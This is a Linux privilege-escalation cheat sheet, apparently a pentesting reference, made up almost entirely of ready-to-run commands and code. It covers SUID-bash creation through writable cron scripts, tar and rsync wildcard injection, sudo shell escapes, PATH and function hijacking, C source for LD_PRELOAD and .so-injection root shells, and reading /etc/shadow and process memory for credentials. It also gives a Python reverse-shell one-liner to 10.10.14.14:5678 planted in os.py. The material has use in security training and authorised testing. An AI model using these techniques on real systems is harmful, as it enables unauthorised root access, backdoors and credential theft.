Privilege Escalation – Linux

Kernel exploits

Check the kernel version and if there is some exploit that can be used to escalate privileges

cat /proc/version
uname -a
searchsploit "Linux Kernel"

Software exploits

Check for the version of the installed packages and services. Maybe there is some old Nagios version (for example) that could be exploited for gain privileges…

It is recommended to check manually the version of the more suspicious installed software.

dpkg -l #Debian
rpm -qa #Centos

If you have SSH access to the machine you could also use openVAS to check for outdated and vulnerable software installed inside the machine.

Processes

Take a look to what processes are being executed and check if any process have more privileges that it should (maybe a tomcat being executed by root?)

ps aux
ps -ef
top -n 1

Process memory

Some services of a server save credentials in clear text inside the memory. If you have access to the memory of a FTP service (for example) you could get the Heap and search inside it the used credentials.

gdb -p <FTP_PROCESS_PID>
(gdb) info proc mappings
(gdb) q
(gdb) dump memory /tmp/mem_ftp <START_HEAD> <END_HEAD>
(qdb) q
strings /tmp/mem_ftp #User and password

Users

Check who are you, which privileges do you have, which users are in the systems, which ones can login and which ones have root privileges

id || (whoami && groups) 2>/dev/null #Me?
cat /etc/passwd | cut -d: -f1 #All users
cat /etc/passwd | grep "sh$" #Users with console
awk -F: '($3 == "0") {print}' /etc/passwd #Superusers
w #Currentlu login users
last | tail #Login history

Scheduled jobs

Check if any scheduled job has any type of vulnerability. Maybe you can take advantage of some script that root execute sometimes (wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?).

crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

Example: Cron path

For example, inside /etc/crontab you can find the sentence: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

If inside this crontab the root user tries to execute dome command or script without setting the path. For example: * * * * root overwrite.sh

Then, you can get a root shell by using:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
#Wait 1 min
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid

Example: Cron using a script with a wildcard (Wildcard Injection)

If a script being executed by root have a “*” inside a command, you could exploit this to make unexpected things (like privesc). Example:

rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script

Other example:

tar -zcf /var/backups/home.tgz /home/* #Create files called "-checkpoint-action= exec=sh rshell.sh" and "-checkpoint=1". The rshell will be executed as soon as 1 file is decompress

Example: Cron script overwritting and symlink

If you can write inside a cron script executed by root, you can get a shell very easily:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
#Wait until it is executed
/tmp/bash -p

If the script executed by root uses somehow a directory in which you have full access. Maybe it could be useful to delete that folder and create a symlink folder to another one

ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>

Commands with sudo and suid commands

You could be allowed to execute some command using sudo or they could have the suid bit. Check it using:

sudo -l #Check commands you can execute with sudo
find / -perm -4000 2>/dev/null #Find all SUID binaries

Some unexpected commands allows you to read and/or write files or even execute command. For example:

sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh
sudo tar c a.tar -I ./runme.sh a
ftp>!/bin/sh
less>! <shell_comand>

https://gtfobins.github.io/

Sudo execution bypassing paths

Jump to read other files or use symlinks. For example in sudeores file: hacker10 ALL= (root) /bin/less /var/log/*

sudo less /var/logs/anything
less>:e /etc/shadow #Jump to read other files using privileged less
ln /etc/shadow /var/log/new
sudo less /var/log/new #Use symlinks to read any file

If a wilcard is used (*), it is even easier:

sudo less /var/log/../../etc/shadow #Read shadow
sudo less /var/log/something /etc/shadow #Red 2 files

Countermeasures: https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/

Sudo command/SUID binary without command path

If the sudo permission is given to a single command without specifying the path: hacker10 ALL= (root) less you can exploit it changing the PATH variable

export PATH=/tmp:$PATH
#Put your backdoor in /tmp and name it "less"
sudo less

This technique can also be used if a suid binary executes another command without specifying the path to it.

SUID binary with command path

If the suid binary executes another command specifying the path, then, you can try to export a function named as the command that the suid file is calling.

For example, if a suid binary calls /usr/sbin/service apache2 start you have to try to create the function and export it:

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service

Then, when you call the suid binary, this function will be executed

LD_PRELOAD

LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.

To avoid this mechanism being using as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.

If you find inside the output of sudo -l the sentence: env_keep+=LD_PRELOAD and you can call some command with sudo, you can escalate privileges.

Save as /tmp/pe.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Then compile it using:

cd /tmp
gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Finally, escalate privileges running

sudo LD_PRELOAD=pe.so <COMMAND> #Use any command you can run with sudo

SUID Binary – so injection

If you find some weird binary with SUID permissions, you could check if all the .so files are loaded correctly. In order to do so you can execute:

strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"

For example, if you find something like: pen(“/home/user/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory) you can exploit it.

Create the file /home/user/.config/libcalc.c with the code:

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject(){
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Compile it using:

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home//user/.config/libcalc.c

And execute the binary.

Capabilities

Check the capabilities of all the executables to check if anyone have more privileges that it should.

getcap -r /

Read sensitive data

Check if you can read some sensitive files and what is contained in some folders. For example:

cat /etc/shadow

Check the contents of /tmp, /var/tmp, /var/backups, /var/mail, /var/spool/mail, /etc/exports

ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/

Find *_history, profile, bashrc files

find / -type f \( -name "*_history" -o -name "profile" -o -name "*bashrc" \) -exec ls -l {} \;

Check for hidden files

find / -type f -iname ".*" -ls 2>/dev/null

Check Web files

ls -alhR /var/www/ 2>/dev/null
ls -alhR /srv/www/htdocs/ 2>/dev/null
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/ 2>/dev/null

Search for backups

find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*back*" -o -name "*bck*" \) 2>/dev/null

Check for regexp or strings inside files (It could be also useful to check log files)

grep -lRi "password" /home /var/www /var/log 2>/dev/null | sort | uniq #Find string password (no cs) in those directories
grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq #IPs inside logs

Check the environment, there could be interesting data

set
env
cat /proc/self/environ

Writable files

You should check if you can write in some sensitive file. For example, can you write to some service configuration file?

find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody
for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user

For example, if the machine is running a tomcat server and you can modify the Tomcat service configuration file inside /etc/systemd/, then you can modify the lines:

ExecStart=/path/to/backdoor
User=root
Group=root

Your backdoor will be executed the next time that tomcat is started.

Python library hijacking

If you know from where a python script is going to be executed and you can write iside that folder or you can modify python libraries, you can modify the os library and backdoor it (if you can write where python script is going to be executed, copy and paste the os.py library).

To backdoor the library just add at the end of the os.py library the following line (change IP and PORT):

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Sniffing

Check if you can sniff traffic. If you can, you could be able to grab some credentials.

timeout 1 tcpdump

Storage information

You can check the storage information using:

df -h

There could be some disks that are not mounted

ls /dev | grep -i "sd"
cat /etc/fstab
lpstat -a# Check if there is any printer

Check for weird executables

Just check the name of the binaries inside /bin, /usr/bin, /sbin, /usr/sbin… (directories inside $PATH)

Privesc exploiting service misconfigurations

NFS no_root_squash misconfiguration
If you belong to docker user, you are basically root
If you belong to lxd, your are root but you still don’t know it

More linux enumeration

Useful Software

which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 perl php ruby xterm 2>/dev/null #Check for some interesting software

Network information

cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null #Known hosts and DNS
dnsdomainname 2>/dev/null
cat /etc/networks 2>/dev/null
ifconfig 2>/dev/null || ip a 2>/dev/null #Info about interfaces
iptables -L 2>/dev/null #Some iptables rules? access??
arp -e 2>/dev/null #Known neightbours
route 2>/dev/null #Network routes
netstat -punta 2>/dev/null #Ports
lsof -i #Files used by network services

Users

gpg --list-keys #Do I have any PGP key?

Files

ls -la $HOME #Files in $HOME
ind /home -type f 2>/dev/null | column -t | grep -v -i "/"$USER #Files in home by not in my $HOME
find  /home /root -name .ssh 2>/dev/null -exec ls -laR {} \; #Check for .ssh directories and their content

Based in this post I have created this script

Other Useful scripts and tools

LinEnum: https://github.com/rebootuser/LinEnum(-t option)
Unix Privesc Check: http://pentestmonkey.net/tools/audit/unix-privesc-check
Linux Priv Checker: www.securitysift.com/download/linuxprivchecker.py
BeeRoot: https://github.com/AlessandroZ/BeRoot/tree/master/Linux
Kernelpop: Enumerate kernel vulns ins linux and MAC https://github.com/spencerdodd/kernelpop
Mestaploit: multi/recon/local_exploit_suggester
Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
EvilAbigail (physical access): https://github.com/GDSSecurity/EvilAbigail

Bibliography

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744
http://0x90909090.blogspot.com/2015/07/no-one-expect-command-execution.html
https://touhidshaikh.com/blog/?p=827
https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf